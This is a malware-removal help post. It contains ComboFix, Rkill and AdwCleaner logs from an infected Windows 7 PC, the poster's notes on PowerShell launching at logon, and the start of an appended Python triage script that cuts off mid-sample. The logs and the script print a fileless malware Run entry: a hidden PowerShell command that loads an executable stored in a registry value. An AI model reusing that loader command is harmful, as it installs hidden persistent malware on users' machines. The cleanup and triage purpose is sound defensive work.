2014-09-17 07:25 . 2013-11-23 18:26 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-09-17 07:25 . 2012-02-11 05:37 317440 ----a-w- c:\windows\system32\spoolsv.exe
2014-09-17 04:04 . 2013-11-26 08:16 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-09-16 23:39 . 2014-09-16 23:39 -------- d-s---w- c:\windows\system32\CompatTel
2014-09-16 21:46 . 2014-09-16 21:46 -------- d-----w- c:\windows\Migration
2014-09-16 21:33 . 2014-09-16 21:38 -------- d-----w- c:\windows\system32\MRT
2014-09-16 21:31 . 2012-07-26 03:21 196608 ----a-w- c:\windows\system32\WUDFHost.exe
2014-09-16 21:31 . 2012-07-26 03:20 73216 ----a-w- c:\windows\system32\WUDFSvc.dll
2014-09-16 21:31 . 2012-07-26 03:20 613888 ----a-w- c:\windows\system32\WUDFx.dll
2014-09-16 21:31 . 2012-07-26 03:20 38912 ----a-w- c:\windows\system32\WUDFCoinstaller.dll
2014-09-16 21:31 . 2012-07-26 03:20 172032 ----a-w- c:\windows\system32\WUDFPlatform.dll
2014-09-16 21:31 . 2012-07-26 02:33 66560 ----a-w- c:\windows\system32\drivers\WUDFPf.sys
2014-09-16 21:31 . 2012-07-26 02:32 155136 ----a-w- c:\windows\system32\drivers\WUDFRd.sys
2014-09-16 21:30 . 2014-03-09 21:47 99480 ----a-w- c:\windows\system32\infocardapi.dll
2014-09-16 21:30 . 2014-06-30 22:14 8856 ----a-w- c:\windows\system32\icardres.dll
2014-09-16 21:30 . 2014-03-09 21:47 619672 ----a-w- c:\windows\system32\icardagt.exe
2014-09-16 21:30 . 2014-06-06 06:16 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-09-16 21:24 . 2013-05-10 04:56 12625408 ----a-w- c:\windows\system32\wmploc.DLL
2014-09-16 21:24 . 2013-05-10 03:48 164864 ----a-w- c:\program files\Windows Media Player\wmplayer.exe
2014-09-16 21:20 . 2014-09-16 21:20 1505280 ----a-w- c:\windows\system32\d3d11.dll
2014-09-16 21:11 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-16 21:10 . 2013-01-24 04:47 196328 ----a-w- c:\windows\system32\drivers\fvevol.sys
2014-09-16 21:10 . 2012-08-21 20:12 245760 ----a-w- c:\windows\system32\OxpsConverter.exe
2014-09-16 21:10 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-16 21:10 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-16 21:10 . 2013-08-05 01:56 133056 ----a-w- c:\windows\system32\drivers\ataport.sys
2014-09-16 21:10 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-16 21:10 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-09-16 21:10 . 2014-08-23 01:46 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-09-16 21:10 . 2014-08-23 00:42 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-09-16 21:10 . 2013-10-30 02:19 301568 ----a-w- c:\windows\system32\msieftp.dll
2014-09-16 21:09 . 2013-07-12 10:07 86016 ----a-w- c:\windows\system32\drivers\usbcir.sys
2014-09-16 21:09 . 2012-01-04 08:58 442880 ----a-w- c:\windows\system32\ntshrui.dll
2014-09-16 21:09 . 2013-12-04 02:03 87040 ----a-w- c:\windows\system32\secproc_ssp_isv.dll
2014-09-16 21:09 . 2013-12-04 02:03 87040 ----a-w- c:\windows\system32\secproc_ssp.dll
2014-09-16 21:09 . 2013-12-04 02:03 423936 ----a-w- c:\windows\system32\secproc_isv.dll
2014-09-16 21:09 . 2013-12-04 02:03 428032 ----a-w- c:\windows\system32\secproc.dll
2014-09-16 21:09 . 2013-12-04 02:02 390144 ----a-w- c:\windows\system32\msdrm.dll
2014-09-16 21:09 . 2013-12-04 01:54 510976 ----a-w- c:\windows\system32\RMActivate_ssp.exe
2014-09-16 21:09 . 2013-12-04 01:54 594944 ----a-w- c:\windows\system32\RMActivate_isv.exe
2014-09-16 21:09 . 2013-12-04 01:54 572416 ----a-w- c:\windows\system32\RMActivate.exe
2014-09-16 21:09 . 2013-12-04 01:54 508928 ----a-w- c:\windows\system32\RMActivate_ssp_isv.exe
2014-09-16 21:06 . 2013-11-27 01:14 258560 ----a-w- c:\windows\system32\drivers\usbhub.sys
2014-09-16 21:06 . 2013-11-27 01:13 284672 ----a-w- c:\windows\system32\drivers\usbport.sys
2014-09-16 21:06 . 2013-11-27 01:13 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2014-09-16 21:06 . 2013-11-27 01:13 43520 ----a-w- c:\windows\system32\drivers\usbehci.sys
2014-09-16 21:06 . 2013-11-27 01:13 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys
2014-09-16 21:06 . 2013-11-27 01:13 24064 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2014-09-16 21:06 . 2013-11-27 01:13 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2014-09-16 21:02 . 2014-05-14 16:23 45536 ----a-w- c:\windows\system32\wups2.dll
2014-09-16 21:02 . 2014-05-14 16:23 54240 ----a-w- c:\windows\system32\wuauclt.exe
2014-09-16 21:02 . 2014-05-14 16:23 1973728 ----a-w- c:\windows\system32\wuaueng.dll
2014-09-16 21:02 . 2014-05-14 16:17 2425856 ----a-w- c:\windows\system32\wucltux.dll
2014-09-16 21:02 . 2014-05-14 16:23 36320 ----a-w- c:\windows\system32\wups.dll
2014-09-16 21:02 . 2014-05-14 16:23 581600 ----a-w- c:\windows\system32\wuapi.dll
2014-09-16 21:02 . 2014-05-14 16:17 92672 ----a-w- c:\windows\system32\wudriver.dll
2014-09-16 21:02 . 2014-05-14 13:23 179656 ----a-w- c:\windows\system32\wuwebv.dll
2014-09-16 21:02 . 2014-05-14 13:17 33792 ----a-w- c:\windows\system32\wuapp.exe
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-15 13:06 . 2011-10-19 21:14 231568 ------w- c:\windows\system32\MpSigStub.exe
2014-08-29 20:34 . 2014-08-29 20:34 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-29 20:22 . 2014-08-29 20:22 33512 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2014-08-29 07:15 . 2010-06-24 15:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-26 18:32 . 2010-11-20 21:29 376832 ----a-w- c:\windows\system32\rpcss.dll
2014-07-25 06:35 . 2014-07-25 06:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-07-19 13:10 . 2011-10-20 14:51 86888 ----a-w- c:\windows\system32\LMIRfsClientNP.dll
2014-07-19 13:10 . 2011-10-20 14:51 53064 ----a-w- c:\windows\system32\Spool\prtprocs\w32x86\LMIproc.dll
2014-07-19 13:10 . 2011-10-20 14:51 31560 ----a-w- c:\windows\system32\LMIport.dll
2014-07-19 13:10 . 2011-10-20 14:51 85832 ----a-w- c:\windows\system32\LMIinit.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt1"]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt2"]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt3"]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt4"]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt5"]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt6"]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt7"]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt8"]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ocx"="c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden [Reflection.Assembly]::Load((gp -Path 'hkcu:software\classes\clsid').OCX).GetType('gm.ks').GetMethod('m').Invoke(0" [X]
"wvxdmfokq"="c:\users\bella\AppData\Local\EmieUserList\wvxdmfokq.dll" [2014-10-03 250880]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IAStorIcon"="c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" [2011-05-20 284440]
"RTHDVCPL"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2011-08-16 10820200]
"NUSB3MON"="c:\program files\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe" [2011-04-14 113288]
"UpdateLBPShortCut"="c:\program files\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe" [2009-05-20 222504]
"CLMLServer"="c:\program files\CyberLink\Power2Go\CLMLSvc.exe" [2009-12-15 103720]
"UpdateP2GoShortCut"="c:\program files\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe" [2009-05-20 222504]
"UCam_Menu"="c:\program files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" [2009-02-18 218408]
"UpdatePSTShortCut"="c:\program files\CyberLink\DVD Suite\MUITransfer\MUIStartMenu.exe" [2010-04-20 222504]
"LogMeIn GUI"="c:\program files\LogMeIn\x86\LogMeInSystray.exe" [2010-09-17 63048]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-09-01 142616]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-09-01 177432]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-09-01 176408]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2011-08-01 1821576]
"itype"="c:\program files\Microsoft IntelliType Pro\itype.exe" [2011-08-10 1313640]
"PC Meter Connect"="c:\program files\Pitney Bowes\PC Meter Connect\mailstationAssistant.exe" [2012-02-07 3514368]
"SBAMTray"="c:\program files\GFI Software\GFIAgent\SBAMTray.exe" [2012-10-16 3226504]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-12-21 959904]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"="c:\program files\SMINST\Launcher.exe" [2010-04-02 237568]
.
c:\users\bella\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\bella\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-9-12 36414624]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SBAMSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SBPIMSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^Users^bella^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2010 Screen Clipper and Launcher.lnk]
path=c:\users\bella\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2010 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2013-12-21 06:04 959904 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BrowserWireless]
2014-09-01 19:52 293376 ----a-w- c:\users\bella\AppData\Local\BrowserWireless\BrowserWireless.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SBAMTray]
2012-10-16 20:29 3226504 ----a-w- c:\program files\GFI Software\GFIAgent\SBAMTray.exe
.
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-05-20 13592]
R2 Intel(R) PROSet Monitoring Service;Intel(R) PROSet Monitoring Service;c:\windows\system32\IProsetMonitor.exe [2011-06-29 112800]
R2 LMIGuardianSvc;LMIGuardianSvc;c:\program files\LogMeIn\x86\LMIGuardianSvc.exe [2014-07-19 375120]
R2 LMIInfo;LogMeIn Kernel Information Provider;c:\program files\LogMeIn\x86\RaInfo.sys [2013-05-24 13624]
R2 MBAMScheduler;MBAMScheduler;c:\progra~1\SAAZOD\Malwarebytes' Anti-Malware\mbamscheduler.exe [2012-09-30 399432]
R2 SAAZDPMACTL;SAAZDPMACTL;c:\progra~1\SAAZOD\SAAZDPMACTL.exe [2011-10-19 86856]
R2 SAAZScheduler;SAAZScheduler;c:\progra~1\SAAZOD\SAAZScheduler.exe [2011-10-19 77824]
R2 SAAZServerPlus;SAAZServerPlus;c:\progra~1\SAAZOD\SAAZServerPlus.exe [2009-04-30 77824]
R2 SAAZWatchDog;SAAZWatchDog;c:\progra~1\SAAZOD\SAAZWatchDog.exe [2011-10-19 86856]
R2 sbapifs;sbapifs;c:\windows\system32\DRIVERS\sbapifs.sys [2012-08-01 66344]
R2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2011-05-04 2656536]
R3 DM150Drv;DM150Drv;c:\windows\system32\DRIVERS\DM150Drv.sys [2010-07-30 20600]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 gfiark;gfiark;c:\windows\system32\drivers\gfiark.sys [2013-05-23 43368]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-09-16 108032]
R3 IntcDAud;Intel(R) Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys [2010-10-15 269824]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2014-10-05 40776]
R3 radpms;Driver for RADPMS Device;c:\windows\system32\DRIVERS\radpms.sys [2010-09-17 13408]
R3 sbwtis;sbwtis;c:\windows\system32\DRIVERS\sbwtis.sys [2012-10-16 75552]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-10-20 1343400]
R4 SAAZapsc;SAAZ RMM Agent Presence-SC;c:\progra~1\SAAZOD\zRealTime\SAAZapsc.exe SAAZapsc [x]
R4 SAAZRemoteSupport;SAAZRemoteSupport;c:\progra~1\SAAZOD\SAAZRemoteSupport.exe [2011-10-19 78664]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 51040]
R4 ZEvtSVC;ZEvtSVC;c:\progra~1\SAAZOD\zSCC\zEvtSVC.exe [2012-11-09 232752]
S2 SAAZappr;SAAZ RMM Agent Presence-PR;c:\progra~1\SAAZOD\zRealTime\SAAZappr.exe SAAZappr [x]
S2 SBAMSvc;VIPRE Business;c:\program files\GFI Software\GFIAgent\SBAMSvc.exe [2012-10-16 3675976]
S2 SBPIMSvc;SB Recovery Service;c:\program files\GFI Software\GFIAgent\SBPIMSvc.exe [2012-10-16 175496]
S3 dc3d;MS Hardware Device Detection Driver (USB);c:\windows\system32\DRIVERS\dc3d.sys [2011-07-28 45288]
S3 MEI;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECI.sys [2010-10-19 41088]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys [2011-06-10 69504]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys [2011-06-10 161664]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-09-25 02:35 1096520 ----a-w- c:\program files\Google\Chrome\Application\37.0.2062.124\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-10-06 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-17 02:35]
.
2014-10-06 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-16 17:50]
.
2014-10-06 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-16 17:50]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
Trusted Zone: ncjar.com\www
TCP: DhcpNameServer = 192.168.0.20
TCP: Interfaces\{C8C75108-648B-43C0-B933-860C92875C7D}: NameServer = 192.168.0.20,8.8.8.8,208.67.222.222
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Approved Extensions]
@Denied: (2) (LocalSystem)
"{2318C2B1-4965-11D4-9B18-009027A5CD4F}"=hex:51,66,7a,6c,4c,1d,38,12,df,c1,0b,
27,57,07,ba,54,e4,0e,43,d0,22,fb,89,5b
"{9030D464-4C02-4ABF-8ECC-5164760863C6}"=hex:51,66,7a,6c,4c,1d,38,12,0a,d7,23,
94,30,02,d1,0f,f1,da,12,24,73,56,27,d2
"{AA58ED58-01DD-4D91-8333-CF10577473F7}"=hex:51,66,7a,6c,4c,1d,38,12,36,ee,4b,
ae,ef,4f,ff,08,fc,25,8c,50,52,2a,37,e3
"{B4F3A835-0E21-4959-BA22-42B3008E02FF}"=hex:51,66,7a,6c,4c,1d,38,12,5b,ab,e0,
b0,13,40,37,0c,c5,34,01,f3,05,d0,46,eb
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:a4,03,e1,5a,85,b1,cf,01
.
[HKEY_USERS\S-1-5-21-336078627-3664855205-978596220-1153_Classes\CLSID]
@DACL=(02 0000)
"Default"=hex:01
"OCX"=hex:4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,
00,40,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-10-06 10:52:27
ComboFix-quarantined-files.txt 2014-10-06 14:52
ComboFix2.txt 2014-09-01 19:44
ComboFix3.txt 2014-08-28 14:13
ComboFix4.txt 2014-08-26 19:26
.
Pre-Run: 421,418,176,512 bytes free
Post-Run: 427,986,157,568 bytes free
.
- - End Of File - - A8B605D167D567FA41CBAF6B19158F5F
5C616939100B85E558DA92B899A0FC36


----------------------------------------------------------------------------------------

Rkill 2.6.8 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
http://www.bleepingcomputer.com/forums/topic308364.html
Program started at: 10/06/2014 10:12:31 AM in x86 mode. (Safe Mode)
Windows Version: Windows 7 Professional Service Pack 1
Checking for Windows services to stop:
* No malware services found to stop.
Checking for processes to terminate:
* No malware processes found to kill.
Checking Registry for malware related settings:
* No issues found in the Registry.
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
Performing miscellaneous checks:
* No issues found.
Checking Windows Service Integrity:
* COM+ Event System (EventSystem) is not Running.
Startup Type set to: Automatic
* Security Center (wscsvc) is not Running.
Startup Type set to: Automatic (Delayed Start)
* Windows Update (wuauserv) is not Running.
Startup Type set to: Automatic (Delayed Start)
Searching for Missing Digital Signatures:
* No issues found.
Checking HOSTS File:
* HOSTS file entries found:
127.0.0.1 localhost
69.25.74.36 MAIL006 #Exchange Hosting 09/02/14 09:28:05
69.25.74.37 MAIL007 #Exchange Hosting 09/02/14 09:28:05
69.25.74.38 BE008 #Exchange Hosting 09/02/14 09:28:05
69.25.74.39 BE009 #Exchange Hosting 09/02/14 09:28:05
69.25.74.40 BE010 #Exchange Hosting 09/02/14 09:28:05
69.25.74.41 BE011 #Exchange Hosting 09/02/14 09:28:05
69.25.74.42 BE012 #Exchange Hosting 09/02/14 09:28:05
69.25.74.43 BE013 #Exchange Hosting 09/02/14 09:28:05
69.25.74.44 BE014 #Exchange Hosting 09/02/14 09:28:05
69.25.75.222 BE015 #Exchange Hosting 09/02/14 09:28:05
69.25.74.46 BE016 #Exchange Hosting 09/02/14 09:28:05
69.25.74.47 BE017 #Exchange Hosting 09/02/14 09:28:05
69.25.74.48 BE018 #Exchange Hosting 09/02/14 09:28:05
69.25.74.49 BE019 #Exchange Hosting 09/02/14 09:28:05
69.25.74.50 BE020 #Exchange Hosting 09/02/14 09:28:05
69.25.74.51 BE021 #Exchange Hosting 09/02/14 09:28:05
69.25.74.52 BE022 #Exchange Hosting 09/02/14 09:28:05
69.25.74.53 BE023 #Exchange Hosting 09/02/14 09:28:05
69.25.74.54 BE024 #Exchange Hosting 09/02/14 09:28:05

20 out of 35 HOSTS entries shown.
Please review HOSTS file for further entries.
Program finished at: 10/06/2014 10:14:55 AM
Execution time: 0 hours(s), 2 minute(s), and 23 seconds(s)



---------------------------------------------------------------------------

# AdwCleaner v3.311 - Report created 06/10/2014 at 10:59:00
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (32 bits)
# Username : bella - NCJAR-NEX-1011
# Running from : C:\download\Cleanup 10-6-14\AdwCleaner.exe
# Option : Clean
***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****
-\\ Internet Explorer v11.0.9600.17280

-\\ Google Chrome v37.0.2062.124
[ File : C:\Users\bella\AppData\Local\Google\Chrome\User Data\Default\preferences ]
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
*************************
AdwCleaner[R0].txt - [8029 octets] - [26/08/2014 14:40:54]
AdwCleaner[R7].txt - [1071 octets] - [06/10/2014 10:56:25]
AdwCleaner[S0].txt - [8272 octets] - [26/08/2014 14:41:52]
AdwCleaner[S6].txt - [998 octets] - [06/10/2014 10:59:00]
########## EOF - C:\AdwCleaner\AdwCleaner[S6].txt - [1057 octets] ##########
 
Powershell.exe keeps getting launched a lot the moment I log in, alongside Pitney Bowes mail meter software, so I've been associating them with each other. Powershell may be getting called by something else, though, in case that's any sort of useful info.

I saw dllhost.exe show up once or twice upon watching the user profile log in, but now there are no more, and I didn't get more than one at the same time, so they may be short-term calls by legit software and services.

So far no return of browser.exe or resident rundll32's or other issues seen previously, which is a good sign.

I will leave everything logged in to return later tonight to take another status report.
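The ComboFix log above carries the entry that starts powershell.exe at logon: the "ocx" value under HKCU\...\CurrentVersion\Run runs powershell.exe with a hidden window and loads a .NET assembly out of the OCX value of HKCU\Software\Classes\CLSID, whose hex dump begins with 4d,5a (the "MZ" header of an executable). The script below is an added triage aid, not part of this thread and not ComboFix's own code: it parses ComboFix's REGEDIT4-style lines, flags that pattern and DLL autostarts living under a user-writable profile folder, and renders the `"name"=-` Registry:: stanza a CFScript uses to delete the flagged Run values. The sample log text is constructed after the lines quoted above.

```python
"""Triage of ComboFix 'Reg Loading Points' / 'LOCKED REGISTRY KEYS' lines.  Added
example, not ComboFix code or the thread's: flags a powershell.exe Run value that
loads a .NET assembly out of the registry, and a value whose bytes start with 'MZ'."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample modelled on the lines quoted in the thread; a trailing
# backslash is the .reg continuation marker, as in ComboFix output.
SAMPLE_LOG = r"""
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ocx"="c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden [Reflection.Assembly]::Load((gp -Path 'hkcu:software\classes\clsid').OCX).GetType('gm.ks').GetMethod('m').Invoke(0" [X]
"wvxdmfokq"="c:\users\bella\AppData\Local\EmieUserList\wvxdmfokq.dll" [2014-10-03 250880]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
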